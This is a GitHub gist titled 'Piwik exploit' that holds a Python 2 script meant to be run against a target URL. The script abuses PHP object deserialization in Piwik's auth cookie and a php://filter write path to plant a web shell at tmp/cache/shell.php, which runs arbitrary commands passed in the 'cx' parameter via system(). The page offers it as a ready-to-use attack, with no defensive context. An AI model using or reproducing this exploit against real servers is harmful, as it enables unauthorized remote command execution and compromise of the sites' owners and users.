Skip to content

Instantly share code, notes, and snippets.

@duketwo

duketwo/gist:945ae7525889a03bbf1b8dee7cfd99fc

Created November 12, 2022 23:17
Show Gist options
  • Save duketwo/945ae7525889a03bbf1b8dee7cfd99fc to your computer and use it in GitHub Desktop.
Save duketwo/945ae7525889a03bbf1b8dee7cfd99fc to your computer and use it in GitHub Desktop.
Download ZIP
Piwik exploit
Raw
gistfile1.txt
# run with "python2 piwik.py http://1.2.3.4/"
import base64
import requests
import sys
class php_ize:
def translate(self, variable):
msg = ""
if type(variable).__name__ == 'int':
msg += 'i:' + str(variable) + ';'
elif type(variable).__name__ == 'str':
msg += 's:' + str(len(variable) - variable.count("\\0")) + ':"' + variable + '";'
elif type(variable).__name__ == 'bool':
msg += 'b:' + str(int(variable)) + ';'
elif type(variable).__name__ == 'instance':
msg += str(variable)
return msg
class ize_phpObject(php_ize):
def __init__(self, obj_name):
self.name = obj_name
self.class_vars = {}
def add_classvar(self, name, value):
self.class_vars[name] = value
def add_priv_var(self, name, value):
self.class_vars["\\0" + self.name + "\\0" + name] = value
def add_prot_var(self, name, value):
self.class_vars["\\0*\\0" + name] = value
def add_object(self, var_name, obj_name):
self.class_vars[var_name] = ize_phpObject(obj_name)
def __str__(self):
msg = 'O:' + str(len(self.name) - self.name.count("\\0")) + ':"' + self.name + '":' + str(
len(self.class_vars)) + ':{'
for key, val in self.class_vars.iteritems():
if (type(val).__name__ == 'instance'):
msg += self.translate(key) + str(val)
else:
msg += self.translate(key) + self.translate(val)
msg += '}'
return msg
class ize_phpArray(php_ize):
def __init__(self, elements_add):
self.elements = elements_add
self.objects = {}
def add_element(self, element):
self.elements.append(element)
def add_array(self, array):
self.elements.extend(array)
def add_object(self, name):
self.objects[name] = ize_phpObject(name)
self.elements.append(self.objects[name])
def add_hash(self, data_in):
self.elements.append(ize_phpHash(data_in))
def __str__(self):
msg = "a:" + str(len(self.elements)) + ":{"
for i, element in enumerate(self.elements):
msg += 'i:' + str(i) + ';' + self.translate(element)
msg += '}'
return msg
class ize_phpHash(php_ize):
def __init__(self, data_in):
self.elements = data_in
def add_element(self, name, value):
self.elements[name] = value
def __str__(self):
msg = "a:" + str(len(self.elements)) + ":{"
for key, val in self.elements.iteritems():
msg += self.translate(key) + self.translate(val)
msg += "}"
return msg
def pawn(location):
code = "if(isset($_REQUEST['cx'])){ echo '<pre>'; $cmd = ($_REQUEST['cx']); system($cmd); echo '</pre>'; die; }"
code = 'Z' + base64.b64encode(base64.b64encode('0k6k5xUxz')) + kekw("<?php " + code + "?>", 5)
path = 'php://filter/write=convert.base64-decode/resource='
path = path + path + path + path + path + location
return candyGenerator(code, path)
def candyGenerator(code, path):
cookie = ize_phpObject("Piwik_Config")
cookie.add_prot_var("configFileUpdated", True)
cookie.add_prot_var("doWriteFileWhenUpdated", True)
cookie.add_prot_var("pathIniFileUserConfig", path)
cookie.add_prot_var("userConfig", ize_phpHash({}))
cookie.class_vars["\\0*\\0userConfig"].add_element(code, ize_phpObject("Zend_Config"))
cookie = str(cookie)
cookie = cookie.replace('\\0', '\0').strip("\n")
print(cookie)
return "Login=" + base64.b64encode(cookie)
def kekw(exp, num):
for i in range(num):
exp = base64.b64encode(exp)
return exp
cookie = pawn('./tmp/cache/shell.php')
url = sys.argv[1]
print("open:" + url + "tmp/cache/shell.php?cx=whoami")
cookies = dict(piwik_auth=cookie)
r = requests.get(url, cookies=cookies)
r.text
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment